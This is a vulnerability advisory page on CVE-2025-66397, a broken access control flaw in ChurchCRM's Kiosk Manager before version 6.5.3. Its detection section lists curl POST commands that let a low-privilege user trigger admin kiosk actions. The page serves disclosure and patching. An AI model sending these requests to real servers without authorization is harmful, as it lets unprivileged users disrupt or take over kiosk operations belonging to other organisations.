CVE-2025-66397
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-12-17

Last updated on: 2025-12-18

Assigner: GitHub, Inc.

Description
ChurchCRM is an open-source church management system. Prior to version 6.5.3, the allowRegistration, acceptKiosk, reloadKiosk, and identifyKiosk functions in the Kiosk Manager feature suffers from broken access control, allowing any authenticated user to allow and accept kiosk registrations, and perform other Kiosk Manager actions such as reload and identify. Version 6.5.3 fixes the issue.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-12-17
Last Modified
2025-12-18
Generated
2026-06-16
AI Q&A
2025-12-17
EPSS Evaluated
2026-06-15
NVD
CVE-2025-66397
EUVD
EUVD-2025-203928
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
churchcrm churchcrm to 6.5.3 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-284 The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability is a Broken Access Control issue in the Kiosk Manager feature of ChurchCRM versions prior to 6.5.3. It allows any authenticated user, not just administrators, to perform administrative actions such as allowing and accepting kiosk registrations, reloading kiosks, and identifying kiosks by sending crafted HTTP POST requests to specific API endpoints. This happens because the affected functions lack proper authorization checks, enabling low-privilege users to execute actions intended only for administrators. [1]

Impact Analysis

The vulnerability allows unauthorized authenticated users to disrupt kiosk services by performing administrative actions. This can affect the availability and integrity of kiosks, potentially causing service disruptions or unauthorized changes to kiosk registrations and operations. Because low-privilege users can execute these actions remotely without special conditions, the impact includes high integrity and availability risks. [1]

Detection Guidance

This vulnerability can be detected by attempting to perform administrative Kiosk Manager actions as a low-privilege authenticated user. Specifically, after logging in and extracting the session cookie, you can issue cURL POST requests to the vulnerable endpoints such as `/churchcrm/api/kiosks/allowRegistration`, `/churchcrm/api/kiosks/[ID]/acceptKiosk`, `/churchcrm/api/kiosks/[ID]/reloadKiosk`, and `/churchcrm/api/kiosks/[ID]/identifyKiosk`. If these requests succeed despite the user lacking administrative privileges, the system is vulnerable. Example commands include: curl -X POST -b "session_cookie=YOUR_SESSION_COOKIE" https://yourchurchcrmserver/churchcrm/api/kiosks/allowRegistration curl -X POST -b "session_cookie=YOUR_SESSION_COOKIE" https://yourchurchcrmserver/churchcrm/api/kiosks/10/acceptKiosk curl -X POST -b "session_cookie=YOUR_SESSION_COOKIE" https://yourchurchcrmserver/churchcrm/api/kiosks/10/reloadKiosk curl -X POST -b "session_cookie=YOUR_SESSION_COOKIE" https://yourchurchcrmserver/churchcrm/api/kiosks/10/identifyKiosk [1]

Mitigation Strategies

The immediate mitigation step is to upgrade ChurchCRM to version 6.5.3 or later, where the broken access control issue in the Kiosk Manager feature is fixed. This update implements strict authorization checks ensuring only administrators can perform the affected actions. Until the upgrade can be applied, restrict access to the vulnerable endpoints and monitor for suspicious activity from low-privilege users attempting to access these API endpoints. [1]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-66397. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart